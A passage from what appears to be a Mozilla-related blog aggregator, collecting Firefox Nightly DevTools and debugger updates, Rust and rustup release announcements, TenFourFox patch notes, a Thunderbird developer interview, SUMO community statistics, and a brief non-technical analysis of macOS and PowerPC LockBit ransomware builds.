In the debugger, there's a side panel on the left side with three tabs, "Sources", "Outline" and "Search". The "Search" tab is active and shows a search input, the number of results, modifier buttons and a filter for files to exclude. Below, actual search results are shown with the matches being highlighted

We now show results from minified and pretty-printed tabs (bug), as well as matches from the node_modules folder (bug), and we hide results from files that are ignored (bug)

Ignoring a file in the Debugger means you won’t step into it. This can be useful when debugging pages built with frameworks, so you can focus only on your code. Read how you can ignore files in the Debugger: https://firefox-source-docs.mozilla.org/devtools-user/debugger/how_to/ignore_a_source/index.html

Project search now also supports glob patterns (bug) and search modifiers (bug), so you can do case-sensitive or regex search on specific parts of your project.
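To illustrate what glob support buys you, here is a rough sketch of how a glob pattern can be compiled to a regular expression for matching file paths (my own simplified illustration, not the debugger's actual implementation):

```javascript
// Compile a simplified glob to a RegExp: "*" matches within one path
// segment, "**" crosses segment boundaries, "?" matches one character.
function globToRegExp(glob) {
  const escaped = glob.replace(/[.+^${}()|[\]\\]/g, "\\$&"); // escape regex chars
  const pattern = escaped
    .replace(/\*\*/g, ".__GLOBSTAR__")   // placeholder so "*" doesn't eat "**"
    .replace(/\*/g, "[^/]*")             // "*" stays inside a path segment
    .replace(/\.__GLOBSTAR__/g, ".*")    // "**" may cross segments
    .replace(/\?/g, "[^/]");             // "?" matches a single character
  return new RegExp(`^${pattern}$`);
}

console.log(globToRegExp("src/**/*.min.js").test("src/vendor/app.min.js")); // true
console.log(globToRegExp("*.css").test("a/b.css"));                         // false
```

Combined with the new search modifiers, a pattern like this lets you restrict a case-sensitive or regex search to just one corner of the project.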

We also spent some time on the Debugger “Pretty-Print” feature

At the beginning of the year, a performance test was added so we can check how our work might impact pretty printing performance, and with it we were able to verify that we made it almost twice as fast as before (bug, bug, bug)

A chart plotting pretty-printing performance from January to April. From January to February, values are stable around 550ms. From the beginning of February to mid-February, values are around 300ms. From mid-February to March, values are around 700ms. From March to April, values are back to 300ms.

We added support for pretty printing inline scripts in HTML files (bug) and made it possible to add column breakpoints to any pretty printed source (bug)

comparison of the debugger text editor before and after pretty printing an HTML file. Before, the inline scripts have single line content. After pretty printing, the inline scripts spans multiple lines and are indented properly.

Alex improved logging of DOMException and Components.Exception, showing a nicely formatted stacktrace (bug)

Side by side comparison of the console output before and after the fix mentioned. Before, we can see a "DOMException: DOMException 💥" error, without stack trace. After, the same exception has some useful trace

Bug fixes:

  • Julian fixed the network monitor performance analysis tools (bug)
  • Julian made the simplified highlighter for prefers-reduced-motion optional (bug)
  • Nicolas fixed inconsistencies with highlighter icons in various DevTools (bug)
  • Nicolas fixed a recent regression which excluded timestamps from console messages when using Copy All Messages / Save All Messages to File (bug)
  • Nicolas made it possible to see and tweak ::backdrop styles from the inspector (bug)
In the rule view, a `dialog::backdrop` rule is displayed under a "Pseudo-elements" section

Firefox Nightly: Harder, Better, Faster, Stronger, Prettier – These Weeks in Firefox: Issue 136

Highlights

Friends of the Firefox team

Introductions/Shout-Outs

  • [:mcheang] I’d like to introduce Marc Seibert [:mseibert] our student worker from Berlin! 🥳

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug
  • CanadaHonk [:canadahonk]
  • Ebilite Uchenna
  • Itiel
  • Noah Osuolale
  • portiawuu
  • Victoria Ajala
New contributors (🌟 = first patch)

Project Updates

Developer Tools

DevTools
  • External contributors
    • Ivan simplified InactivePropertyHelper#hasVerticalWritingMode (bug)
    • jynk.zilla improved our shared Tab component so selecting a Tab in the overflow panel would make it visible in the Tab bar (bug)
    • omid rad fixed the “copy as cURL” context menu action so the resulting command includes --compressed when the response is compressed (bug)
    • Masashi Hirano added support for BigInt for console API format specifier so we conform to the specification (bug)
      • console.log("Value: %d", 42n) -> Value: 42
      • console.log("Value:", 42n) -> Value: 42n
  • Contributions from other teams:
    • arai added RegExp static, Function, Intl.Locale and Error.prototype.stack to the eager evaluation allow list (bug)
    • emilio simplified the inspector walker implementation (bug), which brought a nice 10 to 15% improvement in inspector performance tests
  • Alex added a keyboard shortcut to toggle JS tracing (Ctrl+Shift+5) (bug)
  • Alex also made it possible to programmatically toggle the tracer in privileged code (bug)

const {
  startTracing,
  stopTracing,
} = ChromeUtils.import("resource://devtools/server/tracer/tracer.jsm");

startTracing({ prefix: "testPrefix" });
...
stopTracing();

  • Alex cleaned up the debugger frontend redux store (bug, bug), which led to a ~15% improvement in Browser Toolbox debugger tests
  • Julian introduced and then fixed a bug in Netmonitor for HTTP/3 responses (bug), which he took as an opportunity to add a test for HTTP/3, and he’s currently investigating how we could run most of the Netmonitor tests with HTTP/3 responses
  • Nicolas fixed a bug where logging/expanding objects in the console would lead to warning messages (bug)
  • Nicolas made it possible to style ::backdrop pseudo-element in the inspector (bug)
    • The Firefox DevTools Inspector is shown with the DOM tree on the left and the Style pane on the right. An element is being inspected, and a rule matching on the backdrop pseudo-element is displayed, setting the background of the dialog to rebeccapurple.

      If your name is “Rebecca”, this one is for you.

WebDriver BiDi
  • Sasha added support for the input.releaseActions command (bug, spec) used to release all the keys and pointer buttons that are currently depressed (via input.performActions)
  • Browsertime performed more tests using the BiDi-based HAR generator, with significantly reduced overhead compared to the DevTools-based solution (bug)
  • Julian fixed an issue with load and domContentLoaded events by using the document URL instead of the document baseURI (bug)
  • Henrik improved the navigation timeout error message (bug)
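For reference, a WebDriver BiDi command travels as a JSON message over the session transport; the shape of an input.releaseActions call would look roughly like this (the context id below is a placeholder):

```javascript
// A BiDi command envelope: a client-assigned id, the method name, and its
// params. input.releaseActions targets one browsing context and releases
// all keys and pointer buttons still held down from input.performActions.
const releaseActionsCommand = {
  id: 7,                                        // client-assigned message id
  method: "input.releaseActions",
  params: { context: "context-uuid-placeholder" },
};

console.log(JSON.stringify(releaseActionsCommand));
```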

ESMification status

  • Conversions have continued at a good pace with some big jumps.
  • Converting modules used in workers is waiting on ES module workers to ship.
  • ESMified status:
    • browser: 60.78%
    • toolkit: 78%
    • Total: 74.6% (up from 66.4%)
  • #esmification on Matrix
  • Migration Document (with a walkthrough!)

Lint, Docs and Workflow

  • The work to separate Prettier from ESLint has now landed.
    • It should generally function in a similar way to before, but your editor won’t complain about formatting issues.
    • If you use VS Code, consider running ./mach ide vscode again which will set the relevant preferences.
  • We are planning on upgrading Prettier and enabling it for xhtml/html/json files in the Firefox 115 cycle.

Migration Improvements (CalState LA Project)

Picture-in-Picture

Search and Navigation

Congrats to our student, Marc for landing his first few bugs on search and address bar! Great job! 🎉

Search
SERP Telemetry
Address Bar

Storybook / Reusable components

The Rust Programming Language Blog: Announcing Rustup 1.26.0

The rustup working group is happy to announce the release of rustup version 1.26.0. Rustup is the recommended tool to install Rust, a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of rustup installed, getting rustup 1.26.0 is as easy as stopping any programs which may be using Rustup (e.g. closing your IDE) and running:

rustup self update

Rustup will also automatically update itself at the end of a normal toolchain update:

rustup update

If you don't have it already, you can get rustup from the appropriate page on our website.

What's new in rustup 1.26.0

This version of Rustup involves a significant number of internal cleanups, both in terms of the Rustup code and its tests. In addition to a lot of work on the codebase itself, due to the length of time since the last release this one has a record number of contributors and we thank you all for your efforts and time.

The headlines for this release are:

  1. Add rust-analyzer as a proxy of rustup. Now you can call rust-analyzer and it will be proxied to the rust-analyzer component for the current toolchain.

  2. Bump the clap dependency from 2.x to 3.x. It's a major version bump, so there are some help text changes, but the command line interface is unchanged.

  3. Remove experimental GPG signature validation and the rustup show keys command. Due to its experimental status, validating the integrity of downloaded binaries did not rely on it, and there was no option to abort the installation if a signature mismatch happened. Multiple problems with its implementation were discovered in recent months, which led to the decision to remove the experimental code. The team is working on the design of a new signature validation scheme, which will be implemented in the future.

Full details are available in the changelog!

Rustup's documentation is also available in the rustup book.

Thanks

Thanks again to all the contributors who made rustup 1.26.0 possible!

  • Daniel Silverstone (kinnison)
  • Sabrina Jewson (SabrinaJewson)
  • Robert Collins (rbtcollins)
  • chansuke (chansuke)
  • Shamil (shamilsan)
  • Oli Lalonde (olalonde)
  • 二手掉包工程师 (hi-rustin)
  • Eric Huss (ehuss)
  • J Balint BIRO (jbalintbiro)
  • Easton Pillay (jedieaston)
  • zhaixiaojuan (zhaixiaojuan)
  • Chris Denton (ChrisDenton)
  • Martin Geisler (mgeisler)
  • Lucio Franco (LucioFranco)
  • Nicholas Bishop (nicholasbishop)
  • SADIK KUZU (sadikkuzu)
  • darkyshiny (darkyshiny)
  • René Dudfield (illume)
  • Noritada Kobayashi (noritada)
  • Mohammad AlSaleh (MoSal)
  • Dustin Martin (dmartin)
  • Ville Skyttä (scop)
  • Tshepang Mbambo (tshepang)
  • Illia Bobyr (ilya-bobyr)
  • Vincent Rischmann (vrischmann)
  • Alexander (Alovchin91)
  • Daniel Brotsky (brotskydotcom)
  • zohnannor (zohnannor)
  • Joshua Nelson (jyn514)
  • Prikshit Gautam (gautamprikshit1)
  • Dylan Thacker-Smith (dylanahsmith)
  • Jan David (jdno)
  • Aurora (lilith13666)
  • Pietro Albini (pietroalbini)
  • Renovate Bot (renovate-bot)

Tiger Oakes: Alternatives to the resize event with better performance

Exploring other APIs that integrate closely with the browser's styling engine.

Cameron Kaiser: April patch set for TenFourFox

As promised, there are new changesets to pick up in the TenFourFox tree. (If you're new to rolling your own TenFourFox build, these instructions still generally apply.) I've tried to limit their scope so that people with a partial build can just pull the changes (git pull) and gmake -f client.mk build without having to "clobber" the tree (completely erase and start over). You'll have to do that for the new ESR when that comes out in a couple months, but I'll spare you that today. Most of these patches are security-related, including one that prevents naughty cookies which would affect us as well, though the rest are mostly crash-preventers and would require PowerPC-specific attacks to be exploitable. There is also an update to the ATSUI font blacklist. As always, if you find problematic fonts that need to be suppressed, post them to issue 566 or in the comments, but read this first.

However, there is one feature update in this patchset: a CSS grid whitelist. Firefox 45, which is the heavily patched underpinning of TenFourFox FPR, has a partially working implementation of CSS grid as explained in this MDN article. CSS grid layout is a more flexible and more generalized way of putting elements on a page than the earlier tables method. Go ahead and try to read that article with the current build before you pull the changes and you'll notice that the page has weirdly scrunched up elements (before a script runs and blanks the whole page with an error). After you build with the updates, you'll notice that while the page still doesn't lay out perfectly right, you can now actually read things. That's because there's a whitelist entry now in TenFourFox that allows grid automatically on developer.mozilla.org (a new layout.css.grid.host.developer.mozilla.org preference defaults to true which is checked for by new code in the CSS parser, and there is also an entry in the problematic scripts filter to block the script that ends up blanking the page when it bugs out). The other issues on that page are unrelated to CSS grid.

This will change things for people who set the global pref layout.css.grid.enabled to true, which we have never shipped in TenFourFox because of (at times significant) bugs in the implementation. This pref is now true, but unless the URL hostname is in the whitelist, CSS grid will still be disabled dynamically and is never enabled for chrome resources. If you set the global pref to false, however, then CSS grid is disabled everywhere. If you were using this for a particular site that lays out better with grid on, post the URL to issue 659 or in the comments and I'll consider adding it to the default set (or add it yourself in about:config).
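The gating logic described above can be sketched like this (my own JavaScript illustration of the pref checks, not TenFourFox's actual C++ parser code):

```javascript
// CSS grid is enabled for a page only when the global pref is true AND the
// page's host has its own whitelist entry, mirroring the behavior described
// above: flipping the global pref to false disables grid everywhere.
function cssGridEnabledFor(host, prefs) {
  if (!prefs["layout.css.grid.enabled"]) return false;   // global off switch
  return prefs[`layout.css.grid.host.${host}`] === true; // per-host opt-in
}

const prefs = {
  "layout.css.grid.enabled": true,
  "layout.css.grid.host.developer.mozilla.org": true,
};
console.log(cssGridEnabledFor("developer.mozilla.org", prefs)); // true
console.log(cssGridEnabledFor("example.com", prefs));           // false
```

Adding your own site in about:config amounts to creating another `layout.css.grid.host.*` boolean pref.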

The next ESR (Firefox 115) comes out end of June-early July, and we'll do the usual root updates then.

The Rust Programming Language Blog: Announcing Rust 1.69.0

The Rust team is happy to announce a nice version of Rust, 1.69.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.69.0 with:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.69.0 on GitHub.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.69.0 stable

Rust 1.69.0 introduces no major new features. However, it contains many small improvements, including over 3,000 commits from over 500 contributors.

Cargo now suggests to automatically fix some warnings

Rust 1.29.0 added the cargo fix subcommand to automatically fix some simple compiler warnings. Since then, the number of warnings that can be fixed automatically continues to steadily increase. In addition, support for automatically fixing some simple Clippy warnings has also been added.

In order to draw more attention to these increased capabilities, Cargo will now suggest running cargo fix or cargo clippy --fix when it detects warnings that are automatically fixable:

warning: unused import: `std::hash::Hash`
 --> src/main.rs:1:5
  |
1 | use std::hash::Hash;
  |     ^^^^^^^^^^^^^^^
  |
  = note: `#[warn(unused_imports)]` on by default

warning: `foo` (bin "foo") generated 1 warning (run `cargo fix --bin "foo"` to apply 1 suggestion)

Note that the full Cargo invocation shown above is only necessary if you want to precisely apply fixes to a single crate. If you want to apply fixes to all the default members of a workspace, then a simple cargo fix (with no additional arguments) will suffice.

Debug information is not included in build scripts by default anymore

To improve compilation speed, Cargo now avoids emitting debug information in build scripts by default. There will be no visible effect when build scripts execute successfully, but backtraces in build scripts will contain less information.

If you want to debug a build script, you can add this snippet to your Cargo.toml to emit debug information again:

[profile.dev.build-override]
debug = true
[profile.release.build-override]
debug = true

Stabilized APIs

These APIs are now stable in const contexts:

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.69.0

Many people came together to create Rust 1.69.0. We couldn't have done it without all of you. Thanks!

Mozilla Thunderbird: Meet The Team: Wolf-Martell Montwe, Android Developer

Welcome to a brand new feature called “Meet The Team!” In this ongoing series of conversations, I introduce you to the people behind the software you use every day. We kicked things off by talking to Thunderbird’s Product Design Manager Alex Castellani. Now let’s meet someone much newer to the team: Wolf-Martell Montwe.

Having recently joined us from Berlin as a full-time Android developer, Wolf brings his passion for building mobile applications to the Thunderbird team. He’ll be helping to develop new features and an updated interface for K-9 Mail as we transform it into Thunderbird for Android. I spoke with him about his first computer and early gaming memories, what he hopes to accomplish for the Thunderbird mobile app, and how our community of contributors can help.

<figcaption class="wp-element-caption">Catch up on the “Meet The Team” series by reading my conversation with Alex Castellani</figcaption>

Wolf’s Technology Origin Story

I love a great origin story, and many people working in technology seem to have one that’s directly tied to their first computer. Wolf is no exception.

“I think I started my computer journey with playing games — the first I remember is Sid Meier’s Pirates!” Wolf remembers. “Back then I had an IBM 386. Super slow, super loud! And I hacked around a lot to get games running too, to free up memory, to free up disk space because this was super limited. I think one partition was maximum 3MB! It was a big achievement if something just was running.”

Wolf’s fascination with games eventually led to some basic programming knowledge and web page development.

“I used to develop web pages, especially for my school to build up like a little forum,” he says. “I fell in love with PHP because it had one of the first editors with code completion, and that was awesome.”

What Attracted Wolf To The Thunderbird Project?

“I’m a longtime Thunderbird user, and I have used K-9 Mail from 2010 on,” Wolf says. “In my last position, my task was to build up open source software. (So we developed the software and then prepared it to be open source, because the code was readable, but people couldn’t contribute.) And over that time I fell in love with developing open source, so I was looking for opportunities to follow up on that direction.”

The Thunderbird Android Team Just Doubled In Size. Now What?

Believe it or not, for many years K-9 Mail had one full-time developer (in addition to a community of contributors). So, Wolf effectively doubles the size of the core team. The first questions that came to mind: what doors does this open to the future of Thunderbird for Android, and what can Wolf and cketti accomplish during the next few months?

“First, I want to strengthen the technology base and also open it up for using more modern tooling, especially because the whole Android ecosystem is right now under a really drastic change,” Wolf explains. “It could be pretty beneficial for the project since it’s being rebranded, and I think it’s good timing to then also adapt new technology and base everything on that.”

(The desktop version of Thunderbird is undergoing a similar transformation, as we slowly rebuild it with more modern tooling while eliminating years of technical debt.)

Wolf continues: “I think that would also make the Android app a little bit easier to maintain from the UI side, because right now that is hard to achieve.”

It’s certainly easier for our developers — and our global team of community contributors — to improve an application and more easily add new features when the code isn’t fighting against them.

How Can The Community Help?

There’s so much we can do to contribute to open source software besides writing code. So I asked Wolf: what’s the most important thing the K-9 Mail and Thunderbird community can do to help development?

“Constructive feedback on what we’re doing,” Wolf says. “Whether it’s positive or negative, I think that’s important. But please be nice!”

We certainly encourage everyone on Android to try K-9 Mail as we continue its transformation to Thunderbird. When you’re ready to give feedback or suggest ideas, we invite you to join our Thunderbird Android Planning mailing list, which is open to the public.


Talk to Wolf on Mastodon, and follow him on GitHub.

Download K-9 Mail: F-Droid | Play Store | GitHub.

The post Meet The Team: Wolf-Martell Montwe, Android Developer appeared first on The Thunderbird Blog.

IRL (podcast): Bonus Episode

We have good news to share. IRL: Online Life is Real Life has been nominated for two Webby Awards: one for Public Service and Activism and another for Technology. We need your help. We’d love it if you could go to the links below and vote for us. It’s quick and easy! Voting ends on Thursday, April 20th at midnight PDT.

Vote for IRL in the Webby Awards: Technology and Public Service Activism 

It means so much to spotlight the voices and stories of folks who are making AI more trustworthy in real life, and we love to see them celebrated! 

Thanks for your vote and for listening to IRL!

Cameron Kaiser: Power Mac ransomware? Yes, but it's complicated

Wired ran an article today (via Ars Technica) about apparent macOS-compatible builds of LockBit, a prominent encrypting ransomware suite, such as this one for Apple silicon. There have been other experimental ransomware samples that have previously surfaced but this may be the first known example of a prominent operation specifically targeting Macs, and it is almost certainly not the last.

What caught my eye in the article was a report of PowerPC builds. I can't seem to get an alleged sample to analyse (feel free to contact me at ckaiser at floodgap dawt com if you can provide one) but the source for that assertion appears to be this tweet.

Can that file run on a Power Mac? It appears it's indeed a PowerPC binary, but the executable format is ELF and not Mach-O, so the file can only run natively on Linux or another ELF-based operating system, not PowerPC Mac OS X (or, for that matter, Mac OS 9 and earlier). Even if the raw machine code were sprayed into memory for an exploitable Mac application to be tricked into running, ELF implies the System V ABI, which is similar to but different from the PowerOpen ABI used for PowerPC-compatible versions of Mac OS, and we haven't even started talking about system calls. Rather than a specific build targeting Power Macs, most likely this is evidence that the LockBit builders simply ran every crosscompiler variation they could find on their source code: there are no natively little-endian 32-bit PowerPC CPUs, for example, yet there's a ppcle build visible in the screenshot. Heck, there's even an s390x build. Parents, don't let your mainframes out unsupervised.

This is probably a good time to mention that I've been working on security patches for TenFourFox and a couple minor feature adjustments, so stay tuned. It's been a while, but such are hobbies.

Support.Mozilla.Org: What’s up with SUMO – Q1 2023

Hi everybody,

I know some of you have been asking about the monthly blog post since January. We’re back today, with a summary of what happened in the past 3 months. This will be our new cadence for this kind of post. So please look out for our next edition by early July.

I hope the past 3 months have treated you well. Time surely flies so fast. We’ve done a lot of internal research for the past 3 months, but in Q2, I promise you will see more of me all around our various community channels.

Welcome note and shout-outs

  • Welcome to Kim Jae Woo, Henry Green, Jason Hoyle, Ifeoma, Ray Vermey, Ashfaq, Hisham, Peter, Varun, and Théo. Thanks for joining the Social and Mobile Store Support program!
  • Shout-outs to Tim Maks and Christophe for participating in FOSDEM 2023! Also to Paul for his continued support for Mozfest over the years. You are all amazing!
  • Thanks to everybody for your participation in the Mozilla Support 2023 contributor survey. Your input and feedback are greatly appreciated. #MozLove to you all!

If you know anyone that we should feature here, please contact Kiki, and we’ll make sure to add them in our next edition.

Community news

  • What happened at FOSDEM 2023? Check out this blog post!
  • Learn more about Mozilla.social initiative if you’re into the fediverse world.
  • Watch the recording of our community call in March if you haven’t already to learn more about SUI (Simplified User Interface) screenshot that Lucas shared.
  • It’s also highly recommended to watch our community call in April to catch up on the result of the contributor survey we’ve done in Q1.

Catch up

  • Watch the monthly community call if you haven’t. Learn more about what’s new in January, February and March! Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can answer them during the meeting.
  • If you’re an NDA’ed contributor, you can watch the recording of the Customer Experience weekly scrum meeting from AirMozilla to catch up with the latest product updates.
  • Consider subscribing to Firefox Daily Digest to get daily updates about Firefox from across different platforms.
  • Check out SUMO Engineering Board to see what the platform team is currently doing.

Community stats

KB

KB pageviews (*)

* KB pageviews number is a total of KB pageviews for /en-US/ only

Month Page views Vs previous month
Jan 2023 7,199,541 5.53%
Feb 2023 7,288,066 2.88%
Mar 2023 7,485,556 2.71%

Top 5 KB contributors in the last 90 days: 

KB Localization

Top 10 locales based on total page views

Locale Jan 2023 pageviews (*) Feb 2023 pageviews (*) Mar 2023 pageviews (*) Localization progress (per Apr 17)(**)
de 11.51% 10.34% 10.59% 98%
fr 7.66% 6.81% 7.81% 89%
zh-CN 5.05% 6.64% 7.27% 96%
es 5.91% 5.67% 6.06% 25%
ja 4.22% 4.11% 4.13% 46%
ru 4.09% 3.98% 3.93% 100%
pt-BR 3.00% 2.84% 3.39% 52%
it 2.75% 2.79% 2.65% 99%
pl 2.47% 2.24% 2.25% 88%
zh-TW 0.61% 0.98% 1.47% 3%

* Locale pageviews is an overall pageviews from the given locale (KB and other pages)

** Localization progress is the percentage of localized article from all KB articles per locale

Top 5 localization contributors in the last 90 days: 

Forum Support

Forum stats

Month Total questions Answer rate within 72 hrs Solved rate within 72 hrs Forum helpfulness
Jan 2023 2,888 77.77% 10.28% 47.12%
Feb 2023 2,752 66.10% 9.30% 54.79%
Mar 2023 3,450 66.02% 8.19% 48.91%

Top 5 forum contributors in the last 90 days: 

Social Support

Month Total tweets Total moderation by contributors Total replies by contributors
Jan 2023 314 125 42
Feb 2023 344 140 62
Mar 2023 404 171 55

Top 5 Social Support contributors in the past 3 months: 

  1. Tim Maks 
  2. Bithiah K
  3. Théo C
  4. Daniel López
  5. Peter Gallwas

Play Store Support

Jan 2023
Channel Total reviews Total moderation by contributors Total replies by contributors
Firefox for Android 5,710 250 90
Firefox Focus for Android 785 63 23

 

Feb 2023
Channel Total reviews Total moderation by contributors Total replies by contributors
Firefox for Android 5,025 173 46
Firefox Focus for Android 558 17 4

 

Mar 2023
Channel Total reviews Total moderation by contributors Total replies by contributors
Firefox for Android 5,741 270 69
Firefox Focus for Android 588 29 7

Top 5 Play Store contributors in the past 3 months: 

Product updates

To catch up on product release updates, please watch the recording of the Customer Experience scrum meeting from AirMozilla. You can also subscribe to the AirMozilla folder by clicking on the Subscribe button at the top right corner of the page to get notifications each time we add a new recording.

Useful links:

Frederik Braun: Examine Firefox Inter-Process Communication using JavaScript in 2023

This is my update to the 2021 JavaScript IPC blog post from the Firefox Attack & Defense blog.

Firefox uses Inter-Process Communication (IPC) to implement privilege separation, which makes it an important cornerstone in our security architecture. A previous blog post focused on fuzzing the C++ side of IPC. This blog …

Firefox Nightly: Jam-packed with Updates – These Weeks in Firefox: Issue 135

Highlights

  • In Firefox >= 113 users can now move the extensions button within the navigation toolbar while in Customize Mode (App Menu > More tools > Customize Toolbar)
    Gif of the extensions button being moved within the Firefox navigation bar via mouse drag and drop, which was not possible until now
  • Hubert added the ability to override a script from the debugger (bug)
    • Triggered by right-clicking on a file in the debugger source tree, it will download the file to the user's machine so it can be edited, and the local file is the script that will be used in the page (a purple icon indicates when a file is overridden)
      Image of a context menu within the Firefox debugger showing four different menu options, one of which is selected and called "Add script override"
  • Nicolas added support for inline-script pretty printing, which was requested 9 years ago (bug)
    An image comparing a JavaScript file's formatting before pretty-printing and after pretty-printing within the Firefox debugger.
  • Alex landed a patch that adds a Javascript tracer in the debugger (bug)
    • Behind devtools.debugger.features.javascript-tracing, disabled by default
    • Trace logs can be displayed in the console or stdout. The screenshot below shows traces when disabling an extension in about:addons
      Image of the JavaScript tracer toggle in the Firefox debugger
  • You can test the new migration wizard in Nightly by setting browser.migrate.content-modal.enabled to true. You can open it by visiting about:preferences, and clicking on the “Import Data” button in the General section.
    Image of the new migration wizard used for migrating data from another browser into Firefox, with the picture showing in particular how a user would select and import Safari bookmarks.
  • We recently updated the screenshots component theme to match the browser theme
    • Please test it out by flipping `screenshots.browser.component.enabled` to true
    • Please file any bugs you find here
    • The screenshots below show the buttons in dark theme
      Image of Firefox's screenshot component - which displays a close button, a copy button, and a download button - with updated themes that correspond with a dark theme loaded by the browser.
      Screenshot of the special Firefox page "about:config" taken with the screenshot component.
  • Thanks to lplanch for adding special characters / symbols to generated passwords
    Image of Firefox's generate password prompt showcasing support for special characters, thus improving security
  • niklas landed a patch that adds a new URL bar entrypoint for Picture-in-Picture on Nightly. The PiP icon appears if a PiP-able video is loaded on the page.
    Screenshot of Firefox's URL bar containing several icons, including a brand new icon for the Picture-in-Picture feature which now allows users to watch videos in a new window from the URL bar

Friends of the Firefox team

Resolved bugs from March 21st meeting (skipped)

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Abhijeet Chawla [:ff2400t]
  • Abhishek
  • Alvin
  • Bryan Macoy
  • CanadaHonk [:canadahonk]
  • Ebilite Uchenna
  • Itiel
  • Ganna
  • Lata
  • Leila Kaltouma
  • Leslie
  • ofrazy
  • portiawuu
  • Noah Osuolale
  • Nolan Ishii
  • Sauvic Paul Choudhury[:sauvic]
  • Shah
  • Siya
  • steven w

New contributors (🌟 = first patch)

 

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • Cathy Lu worked on adapting the GeckoView tabs API implementation to support persisted event listeners (needed to make sure an extension event page wakes up on tabs event triggered on Firefox for Android) – Bug 1815310
  • William Durand worked on introducing a new Firefox Remote Debugging Protocol method to uninstall temporarily installed add-ons, and enabled the about:debugging “Remove” and “Terminate Background” extension card actions for remotely connected Firefox instances (which includes both remote Firefox Desktop instances connected over TCP as well as remote Firefox for Android instances connected over ADB) – Bug 1824346, Bug 1823456 and Bug 1823457
  • Firefox >= 113 will persist and prime as expected multiple listeners even when they all share the same extra params – Bug 1795801
  • Fixed missing custom extension icon in permission popup – Bug 1822306
WebExtension APIs
  • As part of the ongoing work on the declarativeNetRequest API:
    • Introduced a startupCache file for the declarativeNetRequest data store, used to load pre-validated DNR rules at browser startup – Bug 1803365
    • Ensured that only same-extension DNR rules are applied to network requests originated by extensions – Bug 1810753
    • Allowed DNR rules to match POST requests of ancestor frames in the allowAllRequests DNR rule action – Bug 1821303
    • Replaced extension.readJSON with fetch for reading static rules JSON files – Bug 1823390

Developer Tools

DevTools
  • External contributors
    • Thanks to Connor Pearson, screenshots are now placed in the images folder on OSX (bug)
    • Thanks to :zacnomore for improving the display of our pseudo class toggle UI (bug). [Image: the pseudo class toggle UI before and after the change, which saves space by displaying the toggles in a row.]
  • Contributions from other teams:
    • Gijs improved console.log for DOM nodes in stdout (bug)
      • console.* are printed to stdout when the following prefs are enabled: devtools.console.stdout.chrome and devtools.console.stdout.content
      • Before, logging a node would print: console.log: ({})
      • Now: console.log: <div class="webRTC-selectDevice-selector-container">
  • Thanks to reports from Gijs and Standard8, Alex improved logging of DOMException and Components.Exception, showing a nicely formatted stacktrace (bug). [Image: DevTools showing DOMException and Components.Exception logged as easier-to-read formatted stack traces.]

 

  • Hubert moved the Debugger Search UI to a regular side panel, which keeps the results list visible while opening scripts in the editor (bug). [Image: the debugger search UI in a side panel, with the results list visible alongside the editor.]
  • Julian fixed the network monitor performance analysis tools (bug)
  • linear() is a new animation timing function that landed in 112 (spec) and Nicolas added a widget to modify its arguments (bug)
    • Double clicking on a point removes it, double clicking anywhere else adds one; points can be moved with drag and drop, and holding Shift snaps the point to the grid. [Image: an interactive line graph in DevTools for modifying the linear() timing function.]
  • Nicolas made it possible to add column breakpoints to pretty printed source (bug)
  • Alex added ChromeUtils.isDevToolsOpened which is a fast way to check if DevTools are opened (bug)
  • Alex landed many patches to improve the readability and performance of the debugger reducers (bug, bug, bug, bug, bug)
  • Alex fixed an issue where empty lines from inline scripts would be marked as breakable (bug)
  • Alex already improved the performance of the JavaScript Tracer (bug)
  • Hubert fixed regex search results highlighting (bug)
  • Hubert also added support for glob patterns in the debugger search (bug)
  • Julian made the simplified highlighter for prefers-reduced-motion optional (bug)
  • Nicolas fixed inconsistencies with highlighter icons in various DevTools (bug)
  • Nicolas fixed a recent regression which excluded timestamps from console messages when using Copy All Messages / Save All Messages to File (bug)
WebDriver BiDi
  • Sasha implemented WebDriver classic commands to find elements inside Shadow Roots (bug)
  • Julian added support for getComputedLabel and getComputedRole to WebDriver classic (bug)
  • Henrik released a new version of geckodriver: 0.33.0, which supports the new commands listed above (bug)
  • Henrik added a shared cache for Elements and ShadowRoots which can be used both by Marionette and WebDriver BiDi, and allows those references to be used transparently between BiDi and Classic (bug)
  • Marionette now returns DOMTokenList instances as collections which will make it easier to work with objects such as Element.classList (bug)
  • Sasha improved the Print command to support the orientation and background parameters (bug, bug)
  • James added support for the input.performActions command to WebDriver BiDi, which allows simulating various user events (bug)

ESMification status

  • A big jump this month. Thank you to all the Outreachy candidates who have been contributing as part of the contribution phase – they have provided a large part of this jump and helped convert a lot of the smaller directories in toolkit/.
  • There are now bugs filed to cover the rest of the conversions of toolkit/, but we will need some volunteers to take them on.
  • Converting modules used in workers is waiting on ES module workers to ship.
  • ESMified status:
    • browser: 58.3%
    • toolkit: 61.8% (up from 39.2%)
    • Total: 66.4% (up from 55.1%)
  • #esmification on Matrix
  • Migration Document (with a walkthrough!)

Lint, Docs and Workflow

  • Enabling of the valid-jsdoc configuration has now been centralised to the top-level .eslintrc.js file. At the same time, we enabled the configuration wherever possible and made it so that it’ll be automatically enabled for new directories.
  • ./mach eslint --fix should now be faster. It was previously running twice when it didn’t really need to.
    • One side effect is that the count of “fixed” reported by ESLint will be the number of fixed files, not the number of actual fixes.
  • The Python linters (pylint, isort, flake8) have been replaced by Ruff.
  • Work has started to separate running Prettier from ESLint.
    • Currently, these are run as part of the same process with Prettier integrated into ESLint.
    • This causes some formatting issues when running with the HTML plugin for ESLint (and formatting is turned on there).
    • It also is potentially slightly slower to run, and is no longer a recommended configuration.
    • Running them separately will make editing easier – you can configure your editor to format on save, and not have it show errors about formatting.
    • ./mach eslint (or ./mach lint -l eslint) will automatically run both processes together.
